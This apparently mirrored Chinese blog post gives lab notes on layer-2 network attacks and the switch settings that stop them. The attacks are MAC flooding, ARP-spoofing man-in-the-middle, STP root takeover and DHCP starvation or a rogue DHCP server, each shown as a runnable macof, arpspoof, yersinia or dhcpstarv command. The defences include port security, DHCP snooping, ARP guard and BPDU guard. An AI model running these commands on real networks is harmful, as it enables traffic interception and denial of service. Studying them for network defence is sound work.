zoukankan      html  css  js  c++  java
  • kali 日志

    MAC协议安全攻防

    kali 攻击 输入 macof -i eth0 -i 选择网卡

    防御 使用交换机的安全特性 

    Port Security

    DCRS 需要开启 mac地址表学习使用cpu控制

    mac-address-learning cpu-control

    在端口上开启

    switchport mode access 开启access模式

    开启端口安全 (必选)

    switchport port-security

    进行mac地址绑定  (可省)

    switchport port-security mac-address

    允许几个人登录 (可省)

    switchport port-security maximum 1

    保护模式 (默认使用shutdown)

    switchport port-security violation 

    四种 

    protect 安全违背保护模式
    recovery 恢复违背状态
    restrict 安全违背限制模式
    shutdown 安全违背关闭模式

    ARP协议安全攻防

    kali 攻击 使用 arpspoof  -i 选择网卡

    一.向主机B声称自己(攻击者)就是网关

    arpspoof -i eth0 -t 192.168.159.132 192.168.159.2 
    (192.168.159.132是我们的攻击目标、192.168.159.2是网关IP地址)

    二、攻击者仅仅欺骗被攻击主机、同时在本地进行Iptable NAT转发(双向)
    使用NAT技术,从服务端返回的数据包也会经过攻击者的主机了,这样,攻击者就可以在本地进行流量内容的修改、流量注入了
    1. 开启端口转发,允许本机像路由器那样转发数据包
    echo 1 > /proc/sys/net/ipv4/ip_forward
    2. ARP投毒,向主机B声称自己(攻击者)就是网关 
    arpspoof -i eth0 -t 192.168.159.132 192.168.159.2 
    (192.168.159.132是我们的攻击目标、192.168.159.2是网关IP地址)
    3. 使用Iptables进行NAT数据包转发
    iptables -t nat -A POSTROUTING -p tcp -s 192.168.159.0/24 -j SNAT --to-source 192.168.159.254
    iptables -t nat -A PREROUTING -p tcp -d 192.168.159.254 -j DNAT --to 192.168.159.132
    有关Iptables的原理请参阅另一篇文章:
    http://www.cnblogs.com/LittleHann/p/3708222.html
    三、攻击者同时欺骗被攻击主机和网关(双向) 
    在双向ARP欺骗中,攻击者仅仅充当了一个"数据包路由转发"的角色,将两个方向的数据包都进行转发
    1. 开启端口转发,允许本机像路由器那样转发数据包
    echo 1 > /proc/sys/net/ipv4/ip_forward
    2. ARP投毒,向主机B声称自己(攻击者)就是网关 
    arpspoof -i eth0 -t 192.168.159.132 192.168.159.2 
    (192.168.159.132是我们的攻击目标、192.168.159.2是网关IP地址) 
    这个指令翻译为中间即为: 告诉"192.168.159.132"这个人,"192.168.159.2"这个IP的MAC就是攻击者本机的MAC地址
    3. ARP投毒,向网关G声称自己(攻击者)就是网关
    arpspoof -i eth0 -t 192.168.159.2 192.168.159.132 
    (192.168.159.2是网关IP地址、192.168.159.132是我们的攻击目标) 

    这个指令翻译为中间即为: 告诉"192.168.159.2"这个人,"192.168.159.132"这个IP的MAC就是攻击者本机的MAC地址

    防御

    方法1。 启用am 

    Access Management

    Switch(Config)#am enable 开启
    Switch(Config)#interface Ethernet 1/0/5 进入e 1/0/5
    Switch(Config-Ethernet0/0/4)#am port 设置am port
    Switch(Config-Ethernet0/0/4)#am mac-ip-pool 00-01-10-22-33-10 192.1.1.2 静态绑定mac和ip 一一对应起来

    端口+ip+mac 绑定 对应的pass 不对应的deny

    注:所有端口都需要配置 较麻烦

    方法2.启用 ip snooping 功能 监听

    全局

    ip dhcp snooping enable 开启 ip dhcp snooping 功能
    ip dhcp snooping vlan 10;20 监听 vlan 号
    ip dhcp snooping binding enable 开启DHCP Snooping绑定
    ip dhcp snooping binding arp     snooping 绑定arp 功能
    端口

    ip dhcp snooping binding user-control vlan 10 启动DHCP Snooping绑定user功能 启用vlan 10
    ip dhcp snooping blocked record interval default  拒绝转发非法报文 记录时间间隔

    方法3.ARP Guard 防止网关欺骗

    arp-guard ip 

    被保护的IP地址。此后从这个端口上接收到源IP地址为<addr>的arp报文就认为报文非法,将被直接丢弃。

     

    方法4.配置免费arp 

    免费arp 作用

    1.确定其它设备的IP地址是否与本机IP地址冲突。 
    2.设备改变了接口MAC 地址,通过发送免费ARP报文通知其他设备更新ARP表项。 

    3.可以防止针对网关的ARP欺骗。交换机定时向局域网内主机广播免费ARP,这样局域

    网内主机的ARP缓存会定时更新,所以在局域网内主机受到针对网关的ARP欺骗后,主机会在收到交换机的免费ARP后,更新其ARP缓存而得到正确网关MAC地址,这样就防止了针对网关的ARP欺骗。

    1. 一次设置两个接口的免费ARP发送功能 

    Switch(config)#ip gratuitous-arp 300 

    Switch(config)#exit  
    2. 一次设计一个接口的免费ARP发送功能 

    Switch(config)#interface vlan 10 
    Switch(Config-if-Vlan10)#ip gratuitous-arp 300 

    Spanning Tree协议安全

     

    攻击

    kali

    yersinia stp (还有其他协议可以攻击)  -i eth0 -attack 3

     -attack 有许多默认的攻击方式

    0:非DOS攻击的发送配置BPDU
    1:非DOS攻击发送拓扑变更BPDU
    2:DOS攻击发送配置BPDU
    3:DOS攻击发送拓扑变更BPDU
    4:非DOS攻击申明根桥的角色
    5:非DOS攻击申明其它角色
    6:DOS攻击申明根桥角色with MiTM

    夺取 Root Bridge 使用-attack 4

     

    防御

    1.开启spanning tree 

    spanning tree 

    2.设置spanning tree 的模式 stp rstp mstp

    spanning tree mode stp/rstp/mstp

    3.设置跟桥优先级

    spanning-tree priority 0

    4.show spanning tree

    查看自己的配置是否是根交换机

    5.在端口上开启 rootguard 设置端口不能成为根端口

    SW(config-if-port-range)#spanning-tree rootguard

    6.方法2 设置边缘端口 并 过滤bpdu 或者获取bpdu 关闭端口

    SW(config-if-port-range)#spanning-tree portfast bpdufilter/bpduguard

    bpdufilter 设置边缘端口过滤BPDU报文
    bpduguard 设置边缘端口收到BPDU报文后关闭

    dhcp 攻击

    kali

    yersinia dhcp (还有其他协议可以攻击)  -i eth0 -attack 0/1/2/3

    在DHCP中实施攻击:
    0:非DOS攻击发送RAW包
    1:DOS攻击发送DISCOVER包  耗尽dhcp池内的ip地址
    2:非DOS攻击创建DHCP流氓服务器 耗尽dhcp池类的地址 自己做dhcp地址池分配ip
    3:DOS攻击发送释放包

    耗尽dhcp池内的ip地址 

    使用 yersinia

    yersinia dhcp -i eth0 -attack 1

    使用dhcpstarv

    dhcpstarv -i eth0 -e 192.168.177.128

    防御 防止dhcp地址池ip耗尽

    开启ip dhcp snooping enable

    ip dhcp snooping vlan 设置监听的vlan

    *可选

    *记录非法信息功能 ip dhcp snooping blocked record enable

    *端口开启记录 ip dhcp snooping blocked record interval default

    *就可以 show ip dh snooping blocked all 看见非法报文

    dhcp 每秒收包数

    ip dhcp snooping limit-rate 5 

    设置trust口 就是连接dhcp服务器的端口

    如果使用了交换机dhcp 功能 就选择一个在vlan里的端口 设置为trust口 或者起一个lo口 来设置dhcp trust口

    默认交换机其他端口都为untrust 每秒收包数达到我们设置的包后 就会shutdown

    抑制DHCP广播报文

    ip dhcp broadcast suppress

    防御 ip dhcp 服务器伪造

    开启dhcp广播抑制 并把dhcp报文发给trust端口

    ip dhcp snooping broadcast suppress

    设置DHCP Snooping检测到伪装Server报文时的自定义动作

    DCRS-5650(config-if-port-range)#ip dhcp snooping action shutdown

    dos攻击与防御

  • 相关阅读:
    优雅的python 写排序算法
    web快速开发c/s软件构架
    软件需求分析模板
    软件工程方面常用图定义和符号
    http协议本身能获取客户端Mac地址问题
    转 苹果的新编程语言 Swift 简介
    转 程序员思维
    转 A Week with Mozilla's Rust
    Unix哲学
    Rule of Modularity
  • 原文地址:https://www.cnblogs.com/hywhyme/p/6603114.html
Copyright © 2011-2022 走看看